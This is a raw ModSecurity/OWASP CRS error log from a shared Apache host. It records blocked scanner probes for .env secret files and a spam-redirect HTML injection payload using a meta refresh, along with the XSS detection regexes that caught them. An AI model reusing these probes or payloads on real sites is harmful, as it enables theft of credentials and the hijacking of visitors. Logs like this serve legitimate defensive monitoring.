[Tue May 12 01:45:07.525388 2026] [security2:error] [pid 1730207:tid 1730229] [client 5.255.121.146:30050] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agJqAzue9Sp-pIv_Bb5_XAAAAVQ"]
[Tue May 12 01:45:07.525551 2026] [security2:error] [pid 1730207:tid 1730229] [client 5.255.121.146:30050] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agJqAzue9Sp-pIv_Bb5_XAAAAVQ"]
[Tue May 12 01:45:07.525697 2026] [security2:error] [pid 1695975:tid 1696001] [client 5.255.121.146:30096] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agJqA9VI9ymHBxup7499tgAAAJc"]
[Tue May 12 01:45:07.525705 2026] [security2:error] [pid 1691274:tid 1691289] [client 5.255.121.146:30092] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agJqA1fdQaraX_prmqcO4QAAAAw"]
[Tue May 12 01:45:07.525777 2026] [security2:error] [pid 1730207:tid 1730229] [client 5.255.121.146:30050] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agJqAzue9Sp-pIv_Bb5_XAAAAVQ"]
[Tue May 12 01:45:07.525862 2026] [security2:error] [pid 1691274:tid 1691289] [client 5.255.121.146:30092] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agJqA1fdQaraX_prmqcO4QAAAAw"]
[Tue May 12 01:45:07.525880 2026] [security2:error] [pid 1695975:tid 1696001] [client 5.255.121.146:30096] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agJqA9VI9ymHBxup7499tgAAAJc"]
[Tue May 12 01:45:07.526054 2026] [security2:error] [pid 1691274:tid 1691289] [client 5.255.121.146:30092] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agJqA1fdQaraX_prmqcO4QAAAAw"]
[Tue May 12 01:45:07.526293 2026] [security2:error] [pid 1695975:tid 1696001] [client 5.255.121.146:30096] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agJqA9VI9ymHBxup7499tgAAAJc"]
[Tue May 12 01:45:24.029782 2026] [security2:error] [pid 1707624:tid 1707691] [client 119.28.100.145:42098] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agJqFLOxS7i6i_mT2NK5FwAAAEk"]
[Tue May 12 01:45:28.123857 2026] [security2:error] [pid 1730207:tid 1730219] [client 43.156.156.96:39276] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/lage-de-raison/"] [unique_id "agJqGDue9Sp-pIv_Bb5_bgAAAUo"]
[Tue May 12 01:45:29.558602 2026] [security2:error] [pid 1730175:tid 1730187] [client 119.28.100.145:36924] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agJqGXo6NvB9WXx5V-5tSgAAAQo"], referer: http://www.maelbailly.fr
[Tue May 12 01:46:06.066569 2026] [security2:error] [pid 1695975:tid 1695981] [client 176.65.139.238:35968] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "facturation.rentparadise.fr"] [uri "/app/.env"] [unique_id "agJqPtVI9ymHBxup749-TwAAAIM"]
[Tue May 12 01:46:06.067006 2026] [security2:error] [pid 1695975:tid 1695981] [client 176.65.139.238:35968] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "facturation.rentparadise.fr"] [uri "/app/.env"] [unique_id "agJqPtVI9ymHBxup749-TwAAAIM"]
[Tue May 12 01:46:06.067289 2026] [security2:error] [pid 1695975:tid 1695981] [client 176.65.139.238:35968] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "facturation.rentparadise.fr"] [uri "/app/.env"] [unique_id "agJqPtVI9ymHBxup749-TwAAAIM"]
[Tue May 12 01:46:08.286770 2026] [security2:error] [pid 1730175:tid 1730183] [client 176.65.139.233:45882] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/app/.env"] [unique_id "agJqQHo6NvB9WXx5V-5tcAAAAQY"]
[Tue May 12 01:46:08.287003 2026] [security2:error] [pid 1730175:tid 1730183] [client 176.65.139.233:45882] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/app/.env"] [unique_id "agJqQHo6NvB9WXx5V-5tcAAAAQY"]
[Tue May 12 01:46:08.287257 2026] [security2:error] [pid 1730175:tid 1730183] [client 176.65.139.233:45882] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/app/.env"] [unique_id "agJqQHo6NvB9WXx5V-5tcAAAAQY"]
[Tue May 12 01:46:42.817698 2026] [security2:error] [pid 1691274:tid 1691289] [client 43.165.7.132:35048] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agJqYlfdQaraX_prmqcPWQAAAAw"]
[Tue May 12 01:47:18.740615 2026] [security2:error] [pid 1730175:tid 1730185] [client 27.78.84.116:65153] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqhno6NvB9WXx5V-5txwAAAQg"]
[Tue May 12 01:47:18.741676 2026] [security2:error] [pid 1730175:tid 1730185] [client 27.78.84.116:65153] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqhno6NvB9WXx5V-5txwAAAQg"]
[Tue May 12 01:47:18.741878 2026] [security2:error] [pid 1730175:tid 1730185] [client 27.78.84.116:65153] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqhno6NvB9WXx5V-5txwAAAQg"]
[Tue May 12 01:47:18.742146 2026] [security2:error] [pid 1730175:tid 1730185] [client 27.78.84.116:65153] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [t [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqhno6NvB9WXx5V-5txwAAAQg"]
[Tue May 12 01:47:18.742826 2026] [security2:error] [pid 1730175:tid 1730185] [client 27.78.84.116:65153] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag " [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqhno6NvB9WXx5V-5txwAAAQg"]
[Tue May 12 01:47:18.743280 2026] [security2:error] [pid 1730175:tid 1730185] [client 27.78.84.116:65153] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqhno6NvB9WXx5V-5txwAAAQg"]
[Tue May 12 01:47:18.743545 2026] [security2:error] [pid 1730175:tid 1730185] [client 27.78.84.116:65153] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqhno6NvB9WXx5V-5txwAAAQg"]
[Tue May 12 01:47:19.624896 2026] [security2:error] [pid 1709071:tid 1709094] [client 27.78.84.116:65253] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqh7vMumyrWMfSu7qa5gAAAMc"]
[Tue May 12 01:47:19.626620 2026] [security2:error] [pid 1709071:tid 1709094] [client 27.78.84.116:65253] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqh7vMumyrWMfSu7qa5gAAAMc"]
[Tue May 12 01:47:19.629261 2026] [security2:error] [pid 1709071:tid 1709094] [client 27.78.84.116:65253] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqh7vMumyrWMfSu7qa5gAAAMc"]
[Tue May 12 01:47:19.630465 2026] [security2:error] [pid 1709071:tid 1709094] [client 27.78.84.116:65253] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [t [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqh7vMumyrWMfSu7qa5gAAAMc"]
